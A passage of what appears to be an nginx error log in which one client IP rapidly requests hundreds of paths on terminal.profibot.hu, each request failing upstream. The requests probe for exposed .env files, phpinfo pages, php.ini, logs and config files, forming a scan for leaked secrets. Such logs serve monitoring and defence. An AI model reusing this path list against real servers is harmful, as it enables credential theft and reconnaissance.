/js/app.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /js/app.bundle.min.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /js/chunk-79be581b.c4b0f5e4.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:24 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /js/chunk-vendors.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /js/chunks/[chunk-name].[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /js/contact_me.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /js/vendor.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /jsrelay/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /jupyter/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /khanlinks/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /kibana/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /kodenames-server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /kolab-syncroton/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Kubernetes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /kubernetes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /l.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lab/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lambda/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /latest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /layout/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lcomernbootcamp/projbackend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /leafer-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ledger_sync/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /legacy/tests/9.1.1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /legacy/tests/9.2.0 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /legal/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lemonldap-ng-doc/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lemonldap-ng-fr-doc/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /letsencrypt/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lib/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lib/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /libraries/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Library/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /libs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lindex.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:25 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /linusadmin-phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /linux/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /local.settings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /localhost/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /locally/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /log.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /log/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /log/development.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /logging/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /login/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /login/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /logs/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /logs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /logs/access.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /logs/app.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /logs/error.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /magento/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mailinabox/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mailman/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main-es2015.3c3aa123423ff18c0b00.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main-es2018.96dcf91e05121e327dcb.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main-TDTOTK7F.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main-WTCAS2AO.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.0ad61943313a734cc3ac.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.2b8841d1a101dd041285.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.35a08c25eb91de70487f.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.457ddfd2b1341056.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.48f1bbcf6201c5ea.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.58a95e8d8659972f.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.702787bb88cacd05b11d.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.b610bd7c7b9b7a47.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:26 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main_user/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Makefile HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /manifest.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /manual/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /master/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /media/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /memcached/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mentorg-lava-docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /micro-app-react-communication/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /micro-app-react/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mindsweeper/gui/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /minified/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /misc/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Modix/ClientApp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /monerod/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mongodb/config/dev/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /monitoring/compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /moodledata/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /msks/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /munki_repo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /music/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /MyRentals.Web/ClientApp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mysql/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /name/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /nest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /netlify.toml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /new-js/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /new.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /news-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /next/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /nginx-server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:27 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /niffler-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /node_modules/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Nodejs-Projects/play-ground/login/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Nodejs-Projects/play-ground/ManageUserRoles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /noVNC/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /now.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Nuke.App.Ui/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /nuxt/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /o.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ocp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /of.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /old/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /old/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /old_phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /old_site/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /oldsanta/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /opencart/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ops/vagrant/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /option/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /orientdb-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /outputs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /owncloud/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /p.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /packages/styled-ui-docs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /packages/web/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /packed/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /page-editor/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /panel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /parity/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Passportjs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /patchwork/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:28 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pfbe/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /php.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /php.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /php1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /php52/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /php_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpcustom_info/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.php4 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.php5 HTTP/1.1", host: 